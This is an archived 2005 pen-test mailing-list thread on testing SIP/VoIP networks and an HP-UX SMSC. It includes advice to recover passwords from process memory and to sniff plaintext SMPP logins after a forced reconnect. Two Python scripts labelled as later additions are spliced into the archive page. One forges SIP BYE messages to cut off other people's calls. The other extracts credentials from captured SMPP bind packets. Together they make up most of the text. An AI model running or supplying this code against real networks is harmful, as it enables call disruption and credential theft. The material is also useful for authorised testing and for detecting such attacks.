Re: Pentesting a SONUS / SIP Network

From: Mihai Amarandei (mihai@xmcopartners.com)
Date: Mon Jun 13 2005 - 10:58:40 EDT


To my knowledge, no such real standard exists yet.
VOIPSA (VoIP Security Alliance, www.voipsa.org) is in the process of
developing a standard taxonomy that would be a base for defining VoIP
pen-test guidelines. But until then, pen-testing in this domain is pretty
much left to the creativity of the pen-tester.
Several methodologies are possible, depending on the extent of your tests:

If you have to verify the entire VoIP infrastructure, you could try a
layered approach:

* physical layer (actually, I think you can skip this one, but I'd rather
mention it): play with the wires and see what you can listen to

* network config/network devices layer (try ARP/DNS poisoning, DHCP
insertion, etc.)

* VoIP signaling protocols (SIP and SIP attacks): testing attack
scenarios (SIP-Bye, SIP-Cancel, ID spoofing, etc.)

* VoIP transport protocols (RTP): here you can mostly try injection attacks

* application/OS layer (search the applications/OS involved for known vulns)

This isn't by any means the only way to carry out a SIP pen-test.

By the way, if anyone out there has other ideas on conducting such
tests, I'd love to hear them.

Mihai
Blog : http://secinternship.blogspot.com

Luis H. Gomez-Danes Mejia wrote:

>Hello,
>
>Does anybody have the name of a standard for doing a pen-test on a SIP
>network? Most of this network is on a Unix flavour, so I have a very good
>idea of what to do; I want to know if any of you knows a document, or the
>name of the document, to establish a baseline to carry out this task.
>
>Thanks in advance.
>
>
>Luis H. Gomez-Danes Mejia
>GDM2000 Consulting
>Tel. 818 1159321
>Mob. 818 2800432
>lgomez@gdm2000.com.mx
>
>The information in this e-mail and attachment is confidential. It is
>intended only for the use of the individual or entity to which it is
>addressed and may contain information that is non-public, proprietary and
>may be legally privileged. If you have received this e-mail in error or are
>not the intended recipient, please immediately notify the sender by return
>e-mail and delete this message from your computer. Any use, distribution, or
>copying of this e-mail other than by the intended recipient is strictly
>prohibited.
>
>
>The information contained in this e-mail and its attachments is
>confidential. It is intended only for the use of the individual or entity to
>which it was addressed and may contain proprietary information that is not in
>the public domain. If you have received this e-mail in error or are not the
>recipient it was sent to, please notify the sender immediately and delete
>this message from your computer. Any use, distribution or reproduction of
>this e-mail other than by the intended recipient is prohibited.
>
>-----Original Message-----
>From: Sebastian Muñiz [mailto:smuniz@elinpar.com]
>Sent: Sunday, June 12, 2005 4:43 PM
>To: J. K.; pen-test@securityfocus.com
>Subject: RE: Pentesting a HP-UX with SMSC
>
>That's OK J.K... you had work to do ;)
>About SMSs, what you could try is to reset the TCP connection of the ESME to
>the SMSC so when it tries to reconnect, in the first data packet you will
>see the username/password in plain text.
>Good luck !!!!
>
>-----Original Message-----
>From: J. K. [mailto:pentest_ml@yahoo.com]
>Sent: Sunday, June 12, 2005 06:07 PM
>To: pen-test@securityfocus.com
>Subject: RE: Pentesting a HP-UX with SMSC
>
>
>Hello Sebastian,
>
>yes, I am pretty sure that I am dealing with an SMSC server. Besides the CIMD2
>banner that it provides, I found some hints in the machine I am connecting
>from (a DMZ host I previously took over) that suggest that we are talking
>about SMS traffic (even if it seems to be a testing environment: I see no
>SMSs when sniffing the network).
>
>I tried to fingerprint the server to figure out exactly what app is running
>there, but with no success.
>
>Anyway, I found an established connection between the client and this
>mysterious server app; my next step will be to attach gdb to the process
>owning that connection: my hope is that username and password are still
>somewhere in its memory space ;)
>
>Cheers
>
>j.k.
>
>P.s.: sorry for the late reply: in the last 3-4 days I focused on another
>part of the target network ;)
>
>--- Sebastian Muñiz <smuniz@elinpar.com> wrote:
>
>
>>These apps do install default user/passwords, but it depends on the one
>>that you found....
>>You should try to identify this one, but though SMSC has no TCP port
>>specially assigned to it, it won't help you unless this software
>>version is on the default port (and identifying the version of every
>>SMSC around would be very hard work)...
>>
>>If you want to connect to it, you should get an ESME (which is the
>>client that connects to an SMSC in this kind of client-server
>>architecture), but the protocol they use, SMPP (Short Message Peer to
>>Peer), uses a username and password (the password could be blank if the
>>SMSC admin wanted so).
>>Here I send you a link to a page where you can find the SMPP protocol
>>specification and an ESME client made in Java to test against this
>>server of yours.
>>
>>
>>
>http://opensmpp.logica.com/CommonPart/Download/download2.html
>
>
>>You could always try to get the source code for this implementation
>>(if this is available) and try to find bugs in it, but it is a subject
>>for another post ;-)
>>
>>ohh... and I am not aware of any exploit around for any
>>implementation of this protocol!!! :( But if you get one, let me know
>>:)
>>
>>anyway..... Are you sure it is an SMSC server that you found????
>>
>> Cheers, Sebastian
>>
>>-----Original Message-----
>>From: J. K. [mailto:pentest_ml@yahoo.com] Sent: Wednesday, June 08,
>>2005 11:05 AM
>>To: pen-test@securityfocus.com
>>Subject: Pentesting a HP-UX with SMSC
>>
>>
>>Hello fellow pen-testers,
>>
>>in my current engagement I bumped into a HP-UX
>>(B.11.11) server protected by a firewall (not an internet-facing
>>firewall, though).
>>The only open ports I can connect to are telnet and 9971.
>>
>>Connecting to 9971 I get the following:
>>
>># telnet x.x.x.x 9971
>>Trying x.x.x.x...
>>Connected to x.x.x.x.
>>Escape character is '^]'.
>>CIMD2-A ConnectionInfo: SessionId = 32551 PortId = 4 Time =
>>050608153449 AccessType = TCPIP_SOCKET PIN =
>>630777
>>
>>Googling around, I found that this daemon should be an SMSC (Short
>>Message Service Center). I also found that on HP-UX there are a few
>>SMSC apps available (Locus, FEELingK, ...)
>>
>>My questions are:
>>1. Do you know of any vulnerability or attack avenue on this
>>protocol/service ?
>>2. Do you know if these SMSC apps install some default user whose
>>password I can try to guess ?
>>3. Any other idea ?
>>
>>Of course I could just fire off Hydra against the telnet server, but I
>>would like to find something less noisy ;)
>>
>>Thanks
>>
>>j.k.
>>

-- 
Mihai Amarandei-Stavila - Xmco Partners
Security Consultant / Penetration Testing
tel  : 33 1 47 34 68 61
web  : http://www.xmcopartners.com
Villa Gabrielle 75015 PARIS
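
The "SIP-Bye" scenario in the layered approach above, worked through as an added example (this is not code from the original post or from any tool it mentions). The INVITE/200 OK pair is a constructed capture; the hosts 10.0.0.11 (caller) and 10.0.0.12 (callee) and all tags and Call-IDs are illustrative. The point it makes is that the three dialog identifiers visible in cleartext signaling (Call-ID, From tag, To tag) plus the callee's Contact are everything needed to forge a BYE the callee will accept; the last function is the matching check a defender would run on sniffed BYEs.

```python
"""Forge a SIP BYE from a sniffed INVITE/200 OK pair (the "SIP-Bye" teardown).

Added example, not code from the original post. SIP messages are constructed
samples; hosts 10.0.0.11 (Alice) and 10.0.0.12 (Bob) are illustrative.
"""
import re
import uuid

# Constructed capture: Alice's INVITE and Bob's 200 OK, as seen on the wire.
INVITE = (
    "INVITE sip:bob@example.com SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 10.0.0.11:5060;branch=z9hG4bK776asdhds\r\n"
    "Max-Forwards: 70\r\n"
    "From: Alice <sip:alice@example.com>;tag=1928301774\r\n"
    "To: Bob <sip:bob@example.com>\r\n"
    "Call-ID: a84b4c76e66710@10.0.0.11\r\n"
    "CSeq: 314159 INVITE\r\n"
    "Contact: <sip:alice@10.0.0.11:5060>\r\n"
    "Content-Length: 0\r\n\r\n"
)
OK_200 = (
    "SIP/2.0 200 OK\r\n"
    "Via: SIP/2.0/UDP 10.0.0.11:5060;branch=z9hG4bK776asdhds\r\n"
    "From: Alice <sip:alice@example.com>;tag=1928301774\r\n"
    "To: Bob <sip:bob@example.com>;tag=a6c85cf\r\n"
    "Call-ID: a84b4c76e66710@10.0.0.11\r\n"
    "CSeq: 314159 INVITE\r\n"
    "Contact: <sip:bob@10.0.0.12:5060>\r\n"
    "Content-Length: 0\r\n\r\n"
)

TAG_RE = re.compile(r";tag=([^;\s]+)")
URI_RE = re.compile(r"<([^>]+)>")


def parse_sip(raw):
    """Return (start_line, headers). Header names are case-insensitive
    (RFC 3261), so keys are lower-cased; a repeated header keeps its
    first value, which is enough for dialog matching."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return lines[0], headers


def extract_dialog(invite_raw, ok_raw):
    """Pull out what a forged in-dialog request needs: Call-ID, both tags,
    the callee's Contact (where the BYE must be sent) and the caller's
    last CSeq."""
    _, inv = parse_sip(invite_raw)
    _, ok = parse_sip(ok_raw)
    if inv["call-id"] != ok["call-id"]:
        raise ValueError("200 OK does not belong to this INVITE")
    return {
        "call_id": inv["call-id"],
        "from": inv["from"],                 # caller's From, with its tag
        "to": ok["to"],                      # callee's To, tag added in the 200 OK
        "local_tag": TAG_RE.search(inv["from"]).group(1),
        "remote_tag": TAG_RE.search(ok["to"]).group(1),
        "remote_target": URI_RE.search(ok["contact"]).group(1),
        "caller_via": inv["via"].split()[1].split(";")[0],
        "next_cseq": int(inv["cseq"].split()[0]) + 1,
    }


def build_bye(dialog):
    """Forge a BYE as if the caller hung up. Request-URI is the callee's
    Contact, From/To carry the dialog tags, and CSeq is one above the
    caller's last request so the callee's stack treats it as new."""
    branch = "z9hG4bK" + uuid.uuid4().hex[:16]   # RFC 3261 magic cookie
    return (
        f"BYE {dialog['remote_target']} SIP/2.0\r\n"
        f"Via: SIP/2.0/UDP {dialog['caller_via']};branch={branch}\r\n"
        "Max-Forwards: 70\r\n"
        f"From: {dialog['from']}\r\n"
        f"To: {dialog['to']}\r\n"
        f"Call-ID: {dialog['call_id']}\r\n"
        f"CSeq: {dialog['next_cseq']} BYE\r\n"
        "Content-Length: 0\r\n\r\n"
    )


def bye_matches_dialog(bye_raw, dialog):
    """Defender-side check: does a BYE carry a known dialog's identifiers?
    A match whose source IP is not the caller's address (a check left to
    the capture layer) is the signature of the teardown attack."""
    start, h = parse_sip(bye_raw)
    m_from = TAG_RE.search(h.get("from", ""))
    m_to = TAG_RE.search(h.get("to", ""))
    return bool(
        start.startswith("BYE ")
        and h.get("call-id") == dialog["call_id"]
        and m_from and m_from.group(1) == dialog["local_tag"]
        and m_to and m_to.group(1) == dialog["remote_tag"]
    )


if __name__ == "__main__":
    d = extract_dialog(INVITE, OK_200)
    bye = build_bye(d)
    print(bye)
    # Sending it (authorised tests only) is one UDP datagram to the callee,
    # ideally sourced from the caller's IP so Via/From look consistent:
    #   socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(bye.encode(), ("10.0.0.12", 5060))
```

The forged BYE works because plain SIP over UDP authenticates nothing in-dialog: any party who saw the INVITE and its 200 OK can produce a request the callee's stack cannot distinguish from the caller's own. The same three identifiers drive the SIP-Cancel variant against a ringing call, and the check in `bye_matches_dialog` is the starting point for detecting either (a matching BYE or CANCEL arriving from an address other than the endpoint that owns the tag).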

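Sebastian's suggestion in the quoted thread (reset the ESME's TCP connection and read the username/password from the first data packet when it reconnects) relies on the layout of the SMPP bind PDU. The following is an added example, not code from the thread or from the OpenSMPP client it links to, that decodes a captured SMPP stream and pulls the credentials out of the bind; the stream is constructed with the builder in the same file, and the ESME name, password and system_type are invented. The PDU layout (16-byte big-endian header of command_length, command_id, command_status, sequence_number, then NUL-terminated system_id, password, system_type, one-byte interface_version, addr_ton, addr_npi, and address_range) is the SMPP 3.4 bind format.

```python
"""Pull ESME credentials out of the SMPP bind PDU sent on (re)connect.

Added example, not from the original thread. SMPP 3.4 bind_* PDUs carry
system_id and password as plain NUL-terminated strings straight after the
16-byte header, which is why forcing the ESME to reconnect and sniffing its
first data packet yields the login. The stream below is constructed.
"""
import struct

BIND_COMMANDS = {          # SMPP 3.4 command_id values
    0x00000001: "bind_receiver",
    0x00000002: "bind_transmitter",
    0x00000009: "bind_transceiver",
}
ENQUIRE_LINK = 0x00000015


def _cstring(buf, off):
    """Read a NUL-terminated ASCII field; return (value, next offset)."""
    end = buf.index(b"\x00", off)
    return buf[off:end].decode("ascii"), end + 1


def build_bind(cmd_id, system_id, password, system_type="", seq=1):
    """Encode a bind_* PDU as an ESME would (used here to construct the
    sample; interface_version 0x34 = SMPP 3.4)."""
    body = (system_id.encode() + b"\x00" + password.encode() + b"\x00"
            + system_type.encode() + b"\x00"
            + bytes([0x34, 0, 0])         # interface_version, addr_ton, addr_npi
            + b"\x00")                    # empty address_range
    return struct.pack(">IIII", 16 + len(body), cmd_id, 0, seq) + body


def parse_bind(pdu):
    """Decode the header and body of a single bind_* PDU."""
    length, cmd_id, status, seq = struct.unpack(">IIII", pdu[:16])
    if cmd_id not in BIND_COMMANDS:
        raise ValueError("not a bind PDU: 0x%08x" % cmd_id)
    if length != len(pdu):
        raise ValueError("command_length %d != %d bytes" % (length, len(pdu)))
    off = 16
    system_id, off = _cstring(pdu, off)
    password, off = _cstring(pdu, off)
    system_type, off = _cstring(pdu, off)
    version, ton, npi = struct.unpack(">BBB", pdu[off:off + 3])
    address_range, off = _cstring(pdu, off + 3)
    return {"command": BIND_COMMANDS[cmd_id], "sequence": seq,
            "system_id": system_id, "password": password,
            "system_type": system_type, "interface_version": version,
            "addr_ton": ton, "addr_npi": npi, "address_range": address_range}


def iter_pdus(stream):
    """Walk a captured TCP payload PDU by PDU using command_length; stop at
    a truncated tail rather than mis-parsing it."""
    off = 0
    while off + 16 <= len(stream):
        length = struct.unpack(">I", stream[off:off + 4])[0]
        if length < 16 or off + length > len(stream):
            break
        yield stream[off:off + length]
        off += length


def find_credentials(stream):
    """Return (command, system_id, password) from the first bind PDU, or None."""
    for pdu in iter_pdus(stream):
        cmd_id = struct.unpack(">I", pdu[4:8])[0]
        if cmd_id in BIND_COMMANDS:
            b = parse_bind(pdu)
            return b["command"], b["system_id"], b["password"]
    return None


# Constructed capture: the ESME binds, then sends an enquire_link keepalive.
SAMPLE_STREAM = (build_bind(0x00000002, "esme01", "s3cret", "VMA", seq=1)
                 + struct.pack(">IIII", 16, ENQUIRE_LINK, 0, 2))

if __name__ == "__main__":
    print(find_credentials(SAMPLE_STREAM))
```

Feed `find_credentials` the reassembled client-to-server payload of the reconnect (for example the bytes sniffed right after the reset); the walk by `command_length` matters because an ESME often sends its first enquire_link in the same segment as the bind, and a parser that assumes one PDU per packet would mis-read it.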

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:24 EDT